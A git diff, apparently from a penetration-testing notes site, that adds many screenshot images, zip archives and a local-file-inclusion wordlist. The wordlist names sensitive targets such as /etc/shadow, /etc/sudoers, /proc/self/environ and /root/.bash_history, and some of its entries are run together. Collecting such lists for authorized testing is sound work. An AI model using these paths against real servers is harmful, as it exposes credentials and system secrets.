Binary files /dev/null and b/.gitbook/assets/image (286).png differ
diff --git a/.gitbook/assets/image (287).png b/.gitbook/assets/image (287).png
new file mode 100644
index 00000000..a4059618
Binary files /dev/null and b/.gitbook/assets/image (287).png differ
diff --git a/.gitbook/assets/image (288).png b/.gitbook/assets/image (288).png
new file mode 100644
index 00000000..b3e1a62d
Binary files /dev/null and b/.gitbook/assets/image (288).png differ
diff --git a/.gitbook/assets/image (289).png b/.gitbook/assets/image (289).png
new file mode 100644
index 00000000..0fefef79
Binary files /dev/null and b/.gitbook/assets/image (289).png differ
diff --git a/.gitbook/assets/image (29).png b/.gitbook/assets/image (29).png
new file mode 100644
index 00000000..62cd4729
Binary files /dev/null and b/.gitbook/assets/image (29).png differ
diff --git a/.gitbook/assets/image (290).png b/.gitbook/assets/image (290).png
new file mode 100644
index 00000000..629c1147
Binary files /dev/null and b/.gitbook/assets/image (290).png differ
diff --git a/.gitbook/assets/image (291).png b/.gitbook/assets/image (291).png
new file mode 100644
index 00000000..ed2eac53
Binary files /dev/null and b/.gitbook/assets/image (291).png differ
diff --git a/.gitbook/assets/image (292).png b/.gitbook/assets/image (292).png
new file mode 100644
index 00000000..84874207
Binary files /dev/null and b/.gitbook/assets/image (292).png differ
diff --git a/.gitbook/assets/image (293).png b/.gitbook/assets/image (293).png
new file mode 100644
index 00000000..6046bf9a
Binary files /dev/null and b/.gitbook/assets/image (293).png differ
diff --git a/.gitbook/assets/image (294).png b/.gitbook/assets/image (294).png
new file mode 100644
index 00000000..87abd176
Binary files /dev/null and b/.gitbook/assets/image (294).png differ
diff --git a/.gitbook/assets/image (295).png b/.gitbook/assets/image (295).png
new file mode 100644
index 00000000..e838ecf8
Binary files /dev/null and b/.gitbook/assets/image (295).png differ
diff --git a/.gitbook/assets/image (296).png b/.gitbook/assets/image (296).png
new file mode 100644
index 00000000..8eb90250
Binary files /dev/null and b/.gitbook/assets/image (296).png differ
diff --git a/.gitbook/assets/image (297).png b/.gitbook/assets/image (297).png
new file mode 100644
index 00000000..3af0780c
Binary files /dev/null and b/.gitbook/assets/image (297).png differ
diff --git a/.gitbook/assets/image (298).png b/.gitbook/assets/image (298).png
new file mode 100644
index 00000000..4b98dfc9
Binary files /dev/null and b/.gitbook/assets/image (298).png differ
diff --git a/.gitbook/assets/image (299).png b/.gitbook/assets/image (299).png
new file mode 100644
index 00000000..7f601f09
Binary files /dev/null and b/.gitbook/assets/image (299).png differ
diff --git a/.gitbook/assets/image (3).png b/.gitbook/assets/image (3).png
new file mode 100644
index 00000000..3ec420eb
Binary files /dev/null and b/.gitbook/assets/image (3).png differ
diff --git a/.gitbook/assets/image (30).png b/.gitbook/assets/image (30).png
new file mode 100644
index 00000000..b1c5a1a1
Binary files /dev/null and b/.gitbook/assets/image (30).png differ
diff --git a/.gitbook/assets/image (300).png b/.gitbook/assets/image (300).png
new file mode 100644
index 00000000..5ddde56d
Binary files /dev/null and b/.gitbook/assets/image (300).png differ
diff --git a/.gitbook/assets/image (301).png b/.gitbook/assets/image (301).png
new file mode 100644
index 00000000..592a4e1a
Binary files /dev/null and b/.gitbook/assets/image (301).png differ
diff --git a/.gitbook/assets/image (302).png b/.gitbook/assets/image (302).png
new file mode 100644
index 00000000..13856325
Binary files /dev/null and b/.gitbook/assets/image (302).png differ
diff --git a/.gitbook/assets/image (303).png b/.gitbook/assets/image (303).png
new file mode 100644
index 00000000..c8e1b598
Binary files /dev/null and b/.gitbook/assets/image (303).png differ
diff --git a/.gitbook/assets/image (304).png b/.gitbook/assets/image (304).png
new file mode 100644
index 00000000..7bc9d373
Binary files /dev/null and b/.gitbook/assets/image (304).png differ
diff --git a/.gitbook/assets/image (305).png b/.gitbook/assets/image (305).png
new file mode 100644
index 00000000..1f519ae6
Binary files /dev/null and b/.gitbook/assets/image (305).png differ
diff --git a/.gitbook/assets/image (306).png b/.gitbook/assets/image (306).png
new file mode 100644
index 00000000..4d34a0da
Binary files /dev/null and b/.gitbook/assets/image (306).png differ
diff --git a/.gitbook/assets/image (307).png b/.gitbook/assets/image (307).png
new file mode 100644
index 00000000..1f096e1e
Binary files /dev/null and b/.gitbook/assets/image (307).png differ
diff --git a/.gitbook/assets/image (308).png b/.gitbook/assets/image (308).png
new file mode 100644
index 00000000..b64184f9
Binary files /dev/null and b/.gitbook/assets/image (308).png differ
diff --git a/.gitbook/assets/image (309).png b/.gitbook/assets/image (309).png
new file mode 100644
index 00000000..f90693ad
Binary files /dev/null and b/.gitbook/assets/image (309).png differ
diff --git a/.gitbook/assets/image (31).png b/.gitbook/assets/image (31).png
new file mode 100644
index 00000000..c3197c6d
Binary files /dev/null and b/.gitbook/assets/image (31).png differ
diff --git a/.gitbook/assets/image (310).png b/.gitbook/assets/image (310).png
new file mode 100644
index 00000000..b010358d
Binary files /dev/null and b/.gitbook/assets/image (310).png differ
diff --git a/.gitbook/assets/image (311).png b/.gitbook/assets/image (311).png
new file mode 100644
index 00000000..01191414
Binary files /dev/null and b/.gitbook/assets/image (311).png differ
diff --git a/.gitbook/assets/image (312).png b/.gitbook/assets/image (312).png
new file mode 100644
index 00000000..5059eac8
Binary files /dev/null and b/.gitbook/assets/image (312).png differ
diff --git a/.gitbook/assets/image (313).png b/.gitbook/assets/image (313).png
new file mode 100644
index 00000000..bcf6ea73
Binary files /dev/null and b/.gitbook/assets/image (313).png differ
diff --git a/.gitbook/assets/image (314).png b/.gitbook/assets/image (314).png
new file mode 100644
index 00000000..e9aa2418
Binary files /dev/null and b/.gitbook/assets/image (314).png differ
diff --git a/.gitbook/assets/image (315).png b/.gitbook/assets/image (315).png
new file mode 100644
index 00000000..5211b080
Binary files /dev/null and b/.gitbook/assets/image (315).png differ
diff --git a/.gitbook/assets/image (316).png b/.gitbook/assets/image (316).png
new file mode 100644
index 00000000..0cb31458
Binary files /dev/null and b/.gitbook/assets/image (316).png differ
diff --git a/.gitbook/assets/image (317).png b/.gitbook/assets/image (317).png
new file mode 100644
index 00000000..b892f104
Binary files /dev/null and b/.gitbook/assets/image (317).png differ
diff --git a/.gitbook/assets/image (318).png b/.gitbook/assets/image (318).png
new file mode 100644
index 00000000..7485eb63
Binary files /dev/null and b/.gitbook/assets/image (318).png differ
diff --git a/.gitbook/assets/image (319).png b/.gitbook/assets/image (319).png
new file mode 100644
index 00000000..cfdae825
Binary files /dev/null and b/.gitbook/assets/image (319).png differ
diff --git a/.gitbook/assets/image (32).png b/.gitbook/assets/image (32).png
new file mode 100644
index 00000000..2c25d0a3
Binary files /dev/null and b/.gitbook/assets/image (32).png differ
diff --git a/.gitbook/assets/image (320).png b/.gitbook/assets/image (320).png
new file mode 100644
index 00000000..c6e1bd7d
Binary files /dev/null and b/.gitbook/assets/image (320).png differ
diff --git a/.gitbook/assets/image (321).png b/.gitbook/assets/image (321).png
new file mode 100644
index 00000000..a15396d7
Binary files /dev/null and b/.gitbook/assets/image (321).png differ
diff --git a/.gitbook/assets/image (322).png b/.gitbook/assets/image (322).png
new file mode 100644
index 00000000..9c2d7098
Binary files /dev/null and b/.gitbook/assets/image (322).png differ
diff --git a/.gitbook/assets/image (323).png b/.gitbook/assets/image (323).png
new file mode 100644
index 00000000..c7a07caa
Binary files /dev/null and b/.gitbook/assets/image (323).png differ
diff --git a/.gitbook/assets/image (324).png b/.gitbook/assets/image (324).png
new file mode 100644
index 00000000..347f7abb
Binary files /dev/null and b/.gitbook/assets/image (324).png differ
diff --git a/.gitbook/assets/image (325).png b/.gitbook/assets/image (325).png
new file mode 100644
index 00000000..2d5dbc90
Binary files /dev/null and b/.gitbook/assets/image (325).png differ
diff --git a/.gitbook/assets/image (326).png b/.gitbook/assets/image (326).png
new file mode 100644
index 00000000..9181a7d1
Binary files /dev/null and b/.gitbook/assets/image (326).png differ
diff --git a/.gitbook/assets/image (327).png b/.gitbook/assets/image (327).png
new file mode 100644
index 00000000..47dfb9bc
Binary files /dev/null and b/.gitbook/assets/image (327).png differ
diff --git a/.gitbook/assets/image (328).png b/.gitbook/assets/image (328).png
new file mode 100644
index 00000000..5aae0337
Binary files /dev/null and b/.gitbook/assets/image (328).png differ
diff --git a/.gitbook/assets/image (329).png b/.gitbook/assets/image (329).png
new file mode 100644
index 00000000..c46cb0ac
Binary files /dev/null and b/.gitbook/assets/image (329).png differ
diff --git a/.gitbook/assets/image (33).png b/.gitbook/assets/image (33).png
new file mode 100644
index 00000000..61c13521
Binary files /dev/null and b/.gitbook/assets/image (33).png differ
diff --git a/.gitbook/assets/image (330).png b/.gitbook/assets/image (330).png
new file mode 100644
index 00000000..3762af99
Binary files /dev/null and b/.gitbook/assets/image (330).png differ
diff --git a/.gitbook/assets/image (331).png b/.gitbook/assets/image (331).png
new file mode 100644
index 00000000..1f096e1e
Binary files /dev/null and b/.gitbook/assets/image (331).png differ
diff --git a/.gitbook/assets/image (332).png b/.gitbook/assets/image (332).png
new file mode 100644
index 00000000..051209e7
Binary files /dev/null and b/.gitbook/assets/image (332).png differ
diff --git a/.gitbook/assets/image (333).png b/.gitbook/assets/image (333).png
new file mode 100644
index 00000000..8bad0978
Binary files /dev/null and b/.gitbook/assets/image (333).png differ
diff --git a/.gitbook/assets/image (334).png b/.gitbook/assets/image (334).png
new file mode 100644
index 00000000..8766fd1c
Binary files /dev/null and b/.gitbook/assets/image (334).png differ
diff --git a/.gitbook/assets/image (335).png b/.gitbook/assets/image (335).png
new file mode 100644
index 00000000..33b0cd0a
Binary files /dev/null and b/.gitbook/assets/image (335).png differ
diff --git a/.gitbook/assets/image (336).png b/.gitbook/assets/image (336).png
new file mode 100644
index 00000000..d56598b8
Binary files /dev/null and b/.gitbook/assets/image (336).png differ
diff --git a/.gitbook/assets/image (337).png b/.gitbook/assets/image (337).png
new file mode 100644
index 00000000..b377b766
Binary files /dev/null and b/.gitbook/assets/image (337).png differ
diff --git a/.gitbook/assets/image (338).png b/.gitbook/assets/image (338).png
new file mode 100644
index 00000000..a4ed42fd
Binary files /dev/null and b/.gitbook/assets/image (338).png differ
diff --git a/.gitbook/assets/image (339).png b/.gitbook/assets/image (339).png
new file mode 100644
index 00000000..c10b1348
Binary files /dev/null and b/.gitbook/assets/image (339).png differ
diff --git a/.gitbook/assets/image (34).png b/.gitbook/assets/image (34).png
new file mode 100644
index 00000000..33653dcb
Binary files /dev/null and b/.gitbook/assets/image (34).png differ
diff --git a/.gitbook/assets/image (340).png b/.gitbook/assets/image (340).png
new file mode 100644
index 00000000..0773caac
Binary files /dev/null and b/.gitbook/assets/image (340).png differ
diff --git a/.gitbook/assets/image (341).png b/.gitbook/assets/image (341).png
new file mode 100644
index 00000000..e3f53841
Binary files /dev/null and b/.gitbook/assets/image (341).png differ
diff --git a/.gitbook/assets/image (342).png b/.gitbook/assets/image (342).png
new file mode 100644
index 00000000..d79dfd96
Binary files /dev/null and b/.gitbook/assets/image (342).png differ
diff --git a/.gitbook/assets/image (35).png b/.gitbook/assets/image (35).png
new file mode 100644
index 00000000..937cc677
Binary files /dev/null and b/.gitbook/assets/image (35).png differ
diff --git a/.gitbook/assets/image (36).png b/.gitbook/assets/image (36).png
new file mode 100644
index 00000000..16db588f
Binary files /dev/null and b/.gitbook/assets/image (36).png differ
diff --git a/.gitbook/assets/image (37).png b/.gitbook/assets/image (37).png
new file mode 100644
index 00000000..4410362d
Binary files /dev/null and b/.gitbook/assets/image (37).png differ
diff --git a/.gitbook/assets/image (38).png b/.gitbook/assets/image (38).png
new file mode 100644
index 00000000..7db5cbb7
Binary files /dev/null and b/.gitbook/assets/image (38).png differ
diff --git a/.gitbook/assets/image (39).png b/.gitbook/assets/image (39).png
new file mode 100644
index 00000000..32dd042d
Binary files /dev/null and b/.gitbook/assets/image (39).png differ
diff --git a/.gitbook/assets/image (4).png b/.gitbook/assets/image (4).png
new file mode 100644
index 00000000..0426dbd4
Binary files /dev/null and b/.gitbook/assets/image (4).png differ
diff --git a/.gitbook/assets/image (40).png b/.gitbook/assets/image (40).png
new file mode 100644
index 00000000..f716e189
Binary files /dev/null and b/.gitbook/assets/image (40).png differ
diff --git a/.gitbook/assets/image (41).png b/.gitbook/assets/image (41).png
new file mode 100644
index 00000000..15832ecc
Binary files /dev/null and b/.gitbook/assets/image (41).png differ
diff --git a/.gitbook/assets/image (42).png b/.gitbook/assets/image (42).png
new file mode 100644
index 00000000..f7a3d09a
Binary files /dev/null and b/.gitbook/assets/image (42).png differ
diff --git a/.gitbook/assets/image (43).png b/.gitbook/assets/image (43).png
new file mode 100644
index 00000000..1ee9326a
Binary files /dev/null and b/.gitbook/assets/image (43).png differ
diff --git a/.gitbook/assets/image (44).png b/.gitbook/assets/image (44).png
new file mode 100644
index 00000000..9b4254a1
Binary files /dev/null and b/.gitbook/assets/image (44).png differ
diff --git a/.gitbook/assets/image (45).png b/.gitbook/assets/image (45).png
new file mode 100644
index 00000000..5cd59eda
Binary files /dev/null and b/.gitbook/assets/image (45).png differ
diff --git a/.gitbook/assets/image (46).png b/.gitbook/assets/image (46).png
new file mode 100644
index 00000000..ac353e4c
Binary files /dev/null and b/.gitbook/assets/image (46).png differ
diff --git a/.gitbook/assets/image (47).png b/.gitbook/assets/image (47).png
new file mode 100644
index 00000000..5edd2e9f
Binary files /dev/null and b/.gitbook/assets/image (47).png differ
diff --git a/.gitbook/assets/image (48).png b/.gitbook/assets/image (48).png
new file mode 100644
index 00000000..278c6e77
Binary files /dev/null and b/.gitbook/assets/image (48).png differ
diff --git a/.gitbook/assets/image (49).png b/.gitbook/assets/image (49).png
new file mode 100644
index 00000000..556135a1
Binary files /dev/null and b/.gitbook/assets/image (49).png differ
diff --git a/.gitbook/assets/image (5).png b/.gitbook/assets/image (5).png
new file mode 100644
index 00000000..b2c2c3d2
Binary files /dev/null and b/.gitbook/assets/image (5).png differ
diff --git a/.gitbook/assets/image (50).png b/.gitbook/assets/image (50).png
new file mode 100644
index 00000000..7243a6f1
Binary files /dev/null and b/.gitbook/assets/image (50).png differ
diff --git a/.gitbook/assets/image (51).png b/.gitbook/assets/image (51).png
new file mode 100644
index 00000000..00ac523d
Binary files /dev/null and b/.gitbook/assets/image (51).png differ
diff --git a/.gitbook/assets/image (52).png b/.gitbook/assets/image (52).png
new file mode 100644
index 00000000..bdeb1bad
Binary files /dev/null and b/.gitbook/assets/image (52).png differ
diff --git a/.gitbook/assets/image (53).png b/.gitbook/assets/image (53).png
new file mode 100644
index 00000000..90412132
Binary files /dev/null and b/.gitbook/assets/image (53).png differ
diff --git a/.gitbook/assets/image (54).png b/.gitbook/assets/image (54).png
new file mode 100644
index 00000000..3e134083
Binary files /dev/null and b/.gitbook/assets/image (54).png differ
diff --git a/.gitbook/assets/image (55).png b/.gitbook/assets/image (55).png
new file mode 100644
index 00000000..455fbb8b
Binary files /dev/null and b/.gitbook/assets/image (55).png differ
diff --git a/.gitbook/assets/image (56).png b/.gitbook/assets/image (56).png
new file mode 100644
index 00000000..298a2278
Binary files /dev/null and b/.gitbook/assets/image (56).png differ
diff --git a/.gitbook/assets/image (57).png b/.gitbook/assets/image (57).png
new file mode 100644
index 00000000..5c39a506
Binary files /dev/null and b/.gitbook/assets/image (57).png differ
diff --git a/.gitbook/assets/image (58).png b/.gitbook/assets/image (58).png
new file mode 100644
index 00000000..9b657ceb
Binary files /dev/null and b/.gitbook/assets/image (58).png differ
diff --git a/.gitbook/assets/image (59).png b/.gitbook/assets/image (59).png
new file mode 100644
index 00000000..3e52a89a
Binary files /dev/null and b/.gitbook/assets/image (59).png differ
diff --git a/.gitbook/assets/image (6).png b/.gitbook/assets/image (6).png
new file mode 100644
index 00000000..1978dd55
Binary files /dev/null and b/.gitbook/assets/image (6).png differ
diff --git a/.gitbook/assets/image (60).png b/.gitbook/assets/image (60).png
new file mode 100644
index 00000000..540b55ef
Binary files /dev/null and b/.gitbook/assets/image (60).png differ
diff --git a/.gitbook/assets/image (61).png b/.gitbook/assets/image (61).png
new file mode 100644
index 00000000..61cc7858
Binary files /dev/null and b/.gitbook/assets/image (61).png differ
diff --git a/.gitbook/assets/image (62).png b/.gitbook/assets/image (62).png
new file mode 100644
index 00000000..b6cad7d3
Binary files /dev/null and b/.gitbook/assets/image (62).png differ
diff --git a/.gitbook/assets/image (63).png b/.gitbook/assets/image (63).png
new file mode 100644
index 00000000..739e8581
Binary files /dev/null and b/.gitbook/assets/image (63).png differ
diff --git a/.gitbook/assets/image (64).png b/.gitbook/assets/image (64).png
new file mode 100644
index 00000000..d2bc0531
Binary files /dev/null and b/.gitbook/assets/image (64).png differ
diff --git a/.gitbook/assets/image (65).png b/.gitbook/assets/image (65).png
new file mode 100644
index 00000000..cc0ab38f
Binary files /dev/null and b/.gitbook/assets/image (65).png differ
diff --git a/.gitbook/assets/image (66).png b/.gitbook/assets/image (66).png
new file mode 100644
index 00000000..7e07102b
Binary files /dev/null and b/.gitbook/assets/image (66).png differ
diff --git a/.gitbook/assets/image (67).png b/.gitbook/assets/image (67).png
new file mode 100644
index 00000000..e2f82d4d
Binary files /dev/null and b/.gitbook/assets/image (67).png differ
diff --git a/.gitbook/assets/image (68).png b/.gitbook/assets/image (68).png
new file mode 100644
index 00000000..c6f396b9
Binary files /dev/null and b/.gitbook/assets/image (68).png differ
diff --git a/.gitbook/assets/image (69).png b/.gitbook/assets/image (69).png
new file mode 100644
index 00000000..54eb3d28
Binary files /dev/null and b/.gitbook/assets/image (69).png differ
diff --git a/.gitbook/assets/image (7).png b/.gitbook/assets/image (7).png
new file mode 100644
index 00000000..35ddb985
Binary files /dev/null and b/.gitbook/assets/image (7).png differ
diff --git a/.gitbook/assets/image (70).png b/.gitbook/assets/image (70).png
new file mode 100644
index 00000000..9a275baa
Binary files /dev/null and b/.gitbook/assets/image (70).png differ
diff --git a/.gitbook/assets/image (71).png b/.gitbook/assets/image (71).png
new file mode 100644
index 00000000..17001451
Binary files /dev/null and b/.gitbook/assets/image (71).png differ
diff --git a/.gitbook/assets/image (72).png b/.gitbook/assets/image (72).png
new file mode 100644
index 00000000..2d4bfc62
Binary files /dev/null and b/.gitbook/assets/image (72).png differ
diff --git a/.gitbook/assets/image (73).png b/.gitbook/assets/image (73).png
new file mode 100644
index 00000000..f90693ad
Binary files /dev/null and b/.gitbook/assets/image (73).png differ
diff --git a/.gitbook/assets/image (74).png b/.gitbook/assets/image (74).png
new file mode 100644
index 00000000..c31211c7
Binary files /dev/null and b/.gitbook/assets/image (74).png differ
diff --git a/.gitbook/assets/image (75).png b/.gitbook/assets/image (75).png
new file mode 100644
index 00000000..5d2bec98
Binary files /dev/null and b/.gitbook/assets/image (75).png differ
diff --git a/.gitbook/assets/image (76).png b/.gitbook/assets/image (76).png
new file mode 100644
index 00000000..f0537a32
Binary files /dev/null and b/.gitbook/assets/image (76).png differ
diff --git a/.gitbook/assets/image (77).png b/.gitbook/assets/image (77).png
new file mode 100644
index 00000000..ec5a7ae1
Binary files /dev/null and b/.gitbook/assets/image (77).png differ
diff --git a/.gitbook/assets/image (78).png b/.gitbook/assets/image (78).png
new file mode 100644
index 00000000..74a3163d
Binary files /dev/null and b/.gitbook/assets/image (78).png differ
diff --git a/.gitbook/assets/image (79).png b/.gitbook/assets/image (79).png
new file mode 100644
index 00000000..61cc7858
Binary files /dev/null and b/.gitbook/assets/image (79).png differ
diff --git a/.gitbook/assets/image (8).png b/.gitbook/assets/image (8).png
new file mode 100644
index 00000000..e732ec2b
Binary files /dev/null and b/.gitbook/assets/image (8).png differ
diff --git a/.gitbook/assets/image (80).png b/.gitbook/assets/image (80).png
new file mode 100644
index 00000000..530b2464
Binary files /dev/null and b/.gitbook/assets/image (80).png differ
diff --git a/.gitbook/assets/image (81).png b/.gitbook/assets/image (81).png
new file mode 100644
index 00000000..fe76944b
Binary files /dev/null and b/.gitbook/assets/image (81).png differ
diff --git a/.gitbook/assets/image (82).png b/.gitbook/assets/image (82).png
new file mode 100644
index 00000000..8f1f2230
Binary files /dev/null and b/.gitbook/assets/image (82).png differ
diff --git a/.gitbook/assets/image (83).png b/.gitbook/assets/image (83).png
new file mode 100644
index 00000000..8ed5aafe
Binary files /dev/null and b/.gitbook/assets/image (83).png differ
diff --git a/.gitbook/assets/image (84).png b/.gitbook/assets/image (84).png
new file mode 100644
index 00000000..1e4d4e8f
Binary files /dev/null and b/.gitbook/assets/image (84).png differ
diff --git a/.gitbook/assets/image (85).png b/.gitbook/assets/image (85).png
new file mode 100644
index 00000000..d136676c
Binary files /dev/null and b/.gitbook/assets/image (85).png differ
diff --git a/.gitbook/assets/image (86).png b/.gitbook/assets/image (86).png
new file mode 100644
index 00000000..af912ceb
Binary files /dev/null and b/.gitbook/assets/image (86).png differ
diff --git a/.gitbook/assets/image (87).png b/.gitbook/assets/image (87).png
new file mode 100644
index 00000000..8ce264e5
Binary files /dev/null and b/.gitbook/assets/image (87).png differ
diff --git a/.gitbook/assets/image (88).png b/.gitbook/assets/image (88).png
new file mode 100644
index 00000000..eaa792ed
Binary files /dev/null and b/.gitbook/assets/image (88).png differ
diff --git a/.gitbook/assets/image (89).png b/.gitbook/assets/image (89).png
new file mode 100644
index 00000000..d8f477bd
Binary files /dev/null and b/.gitbook/assets/image (89).png differ
diff --git a/.gitbook/assets/image (9).png b/.gitbook/assets/image (9).png
new file mode 100644
index 00000000..6fca302e
Binary files /dev/null and b/.gitbook/assets/image (9).png differ
diff --git a/.gitbook/assets/image (90).png b/.gitbook/assets/image (90).png
new file mode 100644
index 00000000..5c489261
Binary files /dev/null and b/.gitbook/assets/image (90).png differ
diff --git a/.gitbook/assets/image (91).png b/.gitbook/assets/image (91).png
new file mode 100644
index 00000000..0506854e
Binary files /dev/null and b/.gitbook/assets/image (91).png differ
diff --git a/.gitbook/assets/image (92).png b/.gitbook/assets/image (92).png
new file mode 100644
index 00000000..d3d51f20
Binary files /dev/null and b/.gitbook/assets/image (92).png differ
diff --git a/.gitbook/assets/image (93).png b/.gitbook/assets/image (93).png
new file mode 100644
index 00000000..c4bf20c0
Binary files /dev/null and b/.gitbook/assets/image (93).png differ
diff --git a/.gitbook/assets/image (94).png b/.gitbook/assets/image (94).png
new file mode 100644
index 00000000..7ebf7f05
Binary files /dev/null and b/.gitbook/assets/image (94).png differ
diff --git a/.gitbook/assets/image (95).png b/.gitbook/assets/image (95).png
new file mode 100644
index 00000000..5059eac8
Binary files /dev/null and b/.gitbook/assets/image (95).png differ
diff --git a/.gitbook/assets/image (96).png b/.gitbook/assets/image (96).png
new file mode 100644
index 00000000..57bdc161
Binary files /dev/null and b/.gitbook/assets/image (96).png differ
diff --git a/.gitbook/assets/image (97).png b/.gitbook/assets/image (97).png
new file mode 100644
index 00000000..da4c2d8c
Binary files /dev/null and b/.gitbook/assets/image (97).png differ
diff --git a/.gitbook/assets/image (98).png b/.gitbook/assets/image (98).png
new file mode 100644
index 00000000..d89235d1
Binary files /dev/null and b/.gitbook/assets/image (98).png differ
diff --git a/.gitbook/assets/image (99).png b/.gitbook/assets/image (99).png
new file mode 100644
index 00000000..bdf76a39
Binary files /dev/null and b/.gitbook/assets/image (99).png differ
diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png
new file mode 100644
index 00000000..893b9e4d
Binary files /dev/null and b/.gitbook/assets/image.png differ
diff --git a/.gitbook/assets/intruder4 (1).gif b/.gitbook/assets/intruder4 (1).gif
new file mode 100644
index 00000000..75ac066e
Binary files /dev/null and b/.gitbook/assets/intruder4 (1).gif differ
diff --git a/.gitbook/assets/intruder4.gif b/.gitbook/assets/intruder4.gif
new file mode 100644
index 00000000..75ac066e
Binary files /dev/null and b/.gitbook/assets/intruder4.gif differ
diff --git a/.gitbook/assets/legion (1).zip b/.gitbook/assets/legion (1).zip
new file mode 100644
index 00000000..12130310
Binary files /dev/null and b/.gitbook/assets/legion (1).zip differ
diff --git a/.gitbook/assets/legion (2).zip b/.gitbook/assets/legion (2).zip
new file mode 100644
index 00000000..91a2a7ac
Binary files /dev/null and b/.gitbook/assets/legion (2).zip differ
diff --git a/.gitbook/assets/legion.zip b/.gitbook/assets/legion.zip
new file mode 100644
index 00000000..12130310
Binary files /dev/null and b/.gitbook/assets/legion.zip differ
diff --git a/.gitbook/assets/lfi (1).txt b/.gitbook/assets/lfi (1).txt
new file mode 100644
index 00000000..28a6c928
--- /dev/null
+++ b/.gitbook/assets/lfi (1).txt	
@@ -0,0 +1,249 @@
+/apache/logs/access.log
+/apache/logs/error.log
+/apachephpphp.ini
+/bin/php.ini
+/ect/hostname
+/etc/apache2/conf/httpd.conf
+/etc/apache2/httpd.conf
+/etc/apache/conf/httpd.conf
+/etc/chrootUsersvar/log/xferlog
+/etc/crontab
+/etc/dovecot/dovecot.passwd
+/etc/fstab
+/etc/ftpchroot
+/etc/ftphosts
+/etc/group
+/etc/hosts
+/etc/httpd.conf
+/etc/httpd/conf/httpd.conf
+/etc/httpd/conf/httpd.confetc/http/conf/httpd.conf
+/etc/httpd/httpd.conf
+/etc/httpd/logs/access.log
+/etc/httpd/logs/access_logetc/httpd/logs/error_log
+/etc/httpd/logs/access.logProgramFilesApacheGroupApachelogsaccess.log
+/etc/httpd/logs/error.log
+/etc/httpd/php.ini
+/etc/http/httpd.conf
+/etc/issue
+/etc/logrotate.d/ftp
+/etc/logrotate.d/proftpdwww/logs/proftpd.system.log
+/etc/logrotate.d/vsftpd.log
+/etc/motd
+/etc/motdetc/passwd
+/etc/my.cnf
+/etc/mysql/my.cnf
+/etc/netconfig
+/etc/passwd
+/etc/php4.4/fcgi/php.inietc/php4/apache/php.ini
+/etc/php4/apache2/php.ini
+/etc/php4/cgi/php.ini
+/etc/php5/apache2/php.ini
+/etc/php5/apache/php.ini
+/etc/php5/cgi/php.ini
+/etc/php/apache2/php.ini
+/etc/php/php4/php.inietc/php/apache/php.ini
+/etc/php/php.ini
+/etc/profile
+/etc/proftp.conf
+/etc/proftpd/modules.confvar/log/vsftpd.log
+/etc/protpd/proftpd.conf
+/etc/pure-ftpd.conf
+/etc/pureftpd.pdbetc/pureftpd.passwd
+/etc/pure-ftpd/pure-ftpd.conf
+/etc/pure-ftpd/pure-ftpd.pdb
+/etc/pure-ftpd/pureftpd.pdb
+/etc/security/environetc/security/limits
+/etc/security/group
+/etc/security/passwd
+/etc/security/user
+/etc/shadow
+/etc/sudoers
+/etc/vhcs2/proftpd/proftpd.conf
+/etc/vsftpd.chroot_list
+/etc/vsftpd.conf
+/etc/vsftpd/vsftpd.conf
+/etc/wu-ftpd/ftpaccess
+/etc/wu-ftpd/ftphosts
+/etc/wu-ftpd/ftpusers
+/home2binstableapachephp.inihomebinstableapachephp.ini
+/logs/access_log
+/logs/access.loglogs/error_log
+/logs/error.log
+/logs/pure-ftpd.log
+/NetServerbinstableapachephp.ini
+/opt/apache/conf/httpd.confopt/apache2/conf/httpd.conf
+/opt/lampp/logs/access_logopt/lampp/logs/access.log
+/opt/lampp/logs/error_log
+/opt/lampp/logs/error.logopt/xampp/logs/access_log
+/opt/xampp/etc/php.ini
+/opt/xampp/logs/access.log
+/opt/xampp/logs/error.log
+/opt/xampp/logs/error_log
+/php4php.ini
+/php5php.ini
+/phpphp.ini
+/PHPphp.ini
+/private/etc/httpd/httpd.conf
+/private/etc/httpd/httpd.conf.defaultVolumes/webBackup/opt/apache2/conf/httpd.conf
+/proc/cmdline
+/proc/mounts
+/proc/net/arp
+/proc/net/route
+/proc/net/tcp
+/proc/net/udp
+/proc/sched_debug
+/proc/self/cmdline
+/proc/self/environ
+/proc/self/fd/0
+/proc/self/fd/1
+/proc/self/fd/10
+/proc/self/fd/11
+/proc/self/fd/12
+/proc/self/fd/13
+/proc/self/fd/14
+/proc/self/fd/15
+/proc/self/fd/16
+/proc/self/fd/17
+/proc/self/fd/18
+/proc/self/fd/19
+/proc/self/fd/2
+/proc/self/fd/20
+/proc/self/fd/21
+/proc/self/fd/22
+/proc/self/fd/23
+/proc/self/fd/24
+/proc/self/fd/25
+/proc/self/fd/26
+/proc/self/fd/27
+/proc/self/fd/28
+/proc/self/fd/29
+/proc/self/fd/3
+/proc/self/fd/30
+/proc/self/fd/31
+/proc/self/fd/32
+/proc/self/fd/33
+/proc/self/fd/34
+/proc/self/fd/35
+/proc/self/fd/36
+/proc/self/fd/4proc/self/fd/5
+/proc/self/fd/6
+/proc/self/fd/7
+/proc/self/fd/8
+/proc/self/fd/9
+/proc/self/stat
+/proc/self/status
+/proc/self/statvar/log/apache2/error_log
+/proc/version
+/ProgramFilesApacheGroupApache2confhttpd.confProgramFilesxamppapacheconfhttpd.conf
+/ProgramFilesApacheGroupApachelogserror.logusr/local/apache2/conf/httpd.conf
+/root/.bash_history
+/usr/apache2/conf/httpd.conf
+/usr/apache/conf/httpd.conf
+/usr/lib/php.ini
+/usr/lib/php/php.ini
+/usr/lib/security/mkuser.default
+/usr/local/apache2/conf/httpd.conf
+/usr/local/apache2/logs/access_logusr/local/apache2/logs/access.log
+/usr/local/apache2/logs/error_log
+/usr/local/apache2/logs/error.logvar/log/access_log
+/usr/local/apache/conf/php.ini
+/usr/local/apache/httpd.confusr/local/apache2/httpd.conf
+/usr/local/apache/logs/access_log
+/usr/local/apache/logs/access.logusr/local/apache/logs/error_log
+/usr/local/apache/logs/error.log
+/usr/local/apps/apache2/conf/httpd.confusr/local/apps/apache/conf/httpd.conf
+/usr/local/cpanel/logs
+/usr/local/cpanel/logs/error_log
+/usr/local/cpanel/logs/license_log
+/usr/local/cpanel/logs/login_logusr/local/cpanel/logs/stats_log
+/usr/local/cpanel/logs/stats_logusr/local/cpanel/logs/access_log
+/usr/local/etc/apache2/conf/httpd.confusr/local/etc/httpd/conf/httpd.conf
+/usr/local/etc/apache/conf/httpd.conf
+/usr/local/etc/apache/conf/httpd.confusr/local/apache/conf/httpd.conf
